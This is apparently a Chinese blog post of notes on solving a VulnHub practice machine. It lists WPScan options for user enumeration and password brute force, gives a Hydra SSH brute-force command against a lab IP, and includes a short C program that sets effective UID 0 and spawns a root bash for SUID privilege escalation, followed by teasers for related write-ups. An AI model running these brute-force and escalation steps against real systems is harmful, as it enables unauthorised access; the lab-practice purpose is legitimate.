vunhub 靶机之旅-1

最新推荐文章于 2024-07-30 21:00:05 发布
原创 最新推荐文章于 2024-07-30 21:00:05 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#自我提升

本文详细介绍如何使用WPScan进行WordPress站点的安全扫描,包括枚举插件、主题、用户及密码爆破等操作,辅以Nmap、Hydra和SUID提权技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

youtube视频:
https://www.youtube.com/watch?v=SerBliNAh1k

nmap
-A 同时打开操作系统指纹和版本检测

wpscan --url 查找 -e enumerate 列举 --enumerate u列举用户
Examples :

帮助
-Further help …
ruby ./wpscan.rb --help
做“非侵入性”检查
-Do ‘non-intrusive’ checks …
ruby ./wpscan.rb --url www.example.com
使用50个线程对枚举的用户做单词列表密码蛮力…
-Do wordlist password brute force on enumerated users using 50 threads …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
做单词表密码蛮力上的“管理员”用户名只…
-Do wordlist password brute force on the ‘admin’ username only …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
枚举安装的插件…
-Enumerate installed plugins …
ruby ./wpscan.rb --url www.example.com --enumerate p
枚举安装的主题
-Enumerate installed themes …
ruby ./wpscan.rb --url www.example.com --enumerate t
枚举用户
-Enumerate users …
ruby ./wpscan.rb --url www.example.com --enumerate u
枚举安装的TimTrBBS
-Enumerate installed timthumbs …
ruby ./wpscan.rb --url www.example.com --enumerate tt
使用HTTP代理
-Use a HTTP proxy …
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118
使用SoCKS5代理
-Use a SOCKS5 proxy … (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000
使用自定义内容目录
-Use custom content directory …
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content
使用自定义插件目录
-Use custom plugins directory …
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins
更新数据库
-Update the DB …
ruby ./wpscan.rb --update
调试输出
-Debug output …
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

先去/home 目录 看用户
再去 /etc/ssh 看 sshd_config
得到 可以ssh的用户

ssh id@localhost
hydra 使用方法:https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html

hydra -l anne -p /usr/share/wordlists/nmap.lst ssh://192.168.247.128
ip + 服务
-s 指定端口
-l 指定用户
-L 指定用户字典
-p 指定密码破解
-P 指定密码字典(文件)

SUID提权 文章:https://www.cnblogs.com/hookjoy/p/6612595.html
#include <stdio.h>
#include <stdlib.h>
int main (void){
seteuid(0);
setegid(0);
system("/bin/bash -p");
return 0;
}
gcc -o hello hello.c

编译后运行,暂时提权
sudo ./hello

:从最开始的FTP 端口的匿名用户进去的,主站是worldpress,进行SSH的爆破 得到密码,查找得到某些用户不能密码登陆。
最后SUID 提权

收获:简单实用nmap,wpscan,ftp命令,hydra 爆破 SUID 提权 /home目录与 /etc/ssh的sshd_config 对比 得确切用户

Vuluhub靶场-breach1
ad12456的博客
05-03 1731
网络设置和准备: 该靶场的ip:192.168.110.140 ,我们要设置为仅主机模式。在虚拟机中将仅主机模式的ip地址范围包含靶机的ip。除了网络设置,还要准备两台kali。一台连接外网,一台和靶机一样要仅主机模式。 信息收集 Nmap扫描 启动靶机,启动kali攻击机。现在了解的信息就一个:IP。首先用nmap扫描端口,看看开启了什么服务。 namp -T4 -A -v 192.168.110.140 发现端口大量的开放,推测应该是安装了蜜罐之类的防护。那我们用最常用的服务端口:80 试一试看
vunhub 靶机之旅-2
ashen的博客
12-09 772
YouTube:https://www.youtube.com/watch?v=GVWPVZ0uRpU Jarbas walkthrough | vulnhub Gobuster 子域名/目录暴力工具 -P string:基本AUTH的密码(仅为DIR模式) -U string:基本AUTH的用户名(仅为DIR模式) -a string:设置用户代理字符串(DIR模式) -c string:用于请...
vuluhub
avasy的博客
02-11 1268
Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in fren...
Vunhub-DC-6
06-11 1139
靶机IP:192.168.20.140网络有问题的可以看下。
Vulunhub Web2靶机练习之lxc
Aiwin的博客
10-04 1098
Vulunhub Web2靶机练习
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 983
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
[vuluhub]-(GoldenEye)
weixin_47920370的博客
08-25 1170
我们在国外漏洞库搜索的时候,发现他要是用PSpellShell,经过仔细寻找,然后我们在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor。hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九头蛇对pop3进行爆破。用邮件里面的用户名和密码进行登陆一下。..
Vluhub 靶场
jieli0901227的博客
10-27 2210
1、什么是Vluhub Vluhub是一个基于docker和docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单 Vluhub 官方地址Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。https://vulhub.org/ 2、靶场搭建 我们使用在kali中进行安装 2.1 docke
vulvhub-----Hacker-KID靶机,2024年最新这是一份面向网络安全开发者的复习指南
2401_83947353的博客
04-14 730
80端口是一个正常的页面,但查看源代码中,看到“ Use a GET parameter page_no to view pages”字样,他的意思是通过GET方法,传入一个page_no的参数9999端口是一个登陆页面,想办法获取账号密码发送到intruder模块,将‘1’添加payload,从1-50开始爆破,爆破后21数值的长度不一样。
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7826
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
vulvhub-----Hacker-KID靶机
woshicainiao666的博客
02-18 1439
bashrc 文件是一个在 Bash shell 启动时自动执行的脚本文件。Bash 是 Linux 和其他 UNIX-like 系统中常用的 shell,而 .bashrc 文件通常位于用户的主目录下(例如,/home/username/ 或 ~),并且通常包含用户的个性化设置和别名等。想要执行成功,需要root进程进行注入,python2.7 exp.py 2185,root进程太多,写一个简单的shell脚本。,是一个注册页面,查看源码,发现是xml格式,猜测是XXE漏洞,抓包验证。
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
2301_78721909的博客
07-30 502
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
AI Web 1靶机渗透实战-vuluhub系列(一)
PANDA墨森的博客
06-27 1480
这是vulnhub靶机系列文章的第一篇,接下来这段时间会分享曾经做过比较接近实战的靶机,把思路分享给大家... 靶机下载链接:https://www.vulnhub.com/entry/ai-web-1,353/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13172299.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机AI-web-1192.168.136.142 #002 实战writeup 寻.
Nmap常用参数
weixin_45750967的博客
10-22 861
Nmap常用参数 参数说明 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。 -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。 -sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式 -sP ping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。 -sU...
vulhub靶场 1-5
weixin_48776804的博客
02-15 795
vulhub靶场漏洞复现
漏洞靶场实战-Vuluhub medium_socnet
ZL_1618的博客
01-04 1014
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
sx:快速强大易于使用的现代化网络扫描器
m0_59598029的博客
08-02 658
运行速度比Nmap要快30倍;ARP扫描:支持扫描本地网络以检测活动设备;ICMP扫描:使用高级ICMP扫描技术来检测活动主机和防火墙规则;TCP SYN扫描:传统半开放扫描以查找开放TCP端口;TCP FIN/NULL/XMAS扫描:扫描某些防火墙绕过技术;自定义TCP扫描:发送任意形式数据包,并获得回复数据包中设置的所有TCP标志的结果;UDP扫描:扫描UDP端口并获取全部ICMP响应,以检测开放端口和防火墙规则;
靶机(X-Forwarded-For)
最新发布
02-23
### 关于靶机中 X-Forwarded-For 的使用场景及配置方法 #### 使用场景 `X-Forwarded-For` 是一个HTTP头字段,通常由代理服务器、负载均衡器或其他中间件设置。该头部用于识别通过HTTP代理或负载平衡器之后的客户端原始IP地址。当请求经过多个中介节点时,每个节点可以在 `X-Forwarded-For` 头部追加自己的IP地址,形成一系列的IP列表[^4]。 对于Web应用程序而言,在处理来自外部网络的流量时,如果前端部署有反向代理,则应用本身接收到的是代理服务器的IP而非最终用户的实际公网IP。此时就需要依赖 `X-Forwarded-For` 来获取真实的访问者信息[^2]。 #### 配置方法 在Linux环境下(如Ubuntu),可以通过修改Nginx或Apache等Web服务器配置文件来支持并信任特定来源的 `X-Forwarded-For` 请求头: ##### Nginx 配置示例 编辑站点配置文件 `/etc/nginx/sites-available/default` 或其他自定义位置下的相应配置文件,加入如下内容: ```nginx location / { proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } ``` 上述配置使得Nginx能够正确转发客户端的真实IP给后端的应用程序,并且会自动累加现有的 `X-Forwarded-For` 值。 ##### Apache 配置示例 针对Apache Web Server, 修改 `.htaccess` 文件或者主配置文件中的 `<VirtualHost>` 指令部分,添加以下指令: ```apache RequestHeader set X-Forwarded-Proto "https" SetEnvIf X-Forwarded-For "^.*\..*\..*\.." forwarded=yes RequestHeader append X-Forwarded-For %{REMOTE_ADDR}s env=forwarded ``` 这段代码实现了类似的功能——即确保每次请求都携带更新后的 `X-Forwarded-For` 字段传递至下游服务。 为了使更改生效,记得重启相应的Web服务器进程: ```bash sudo systemctl restart nginx # or for apache sudo systemctl restart apache2 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值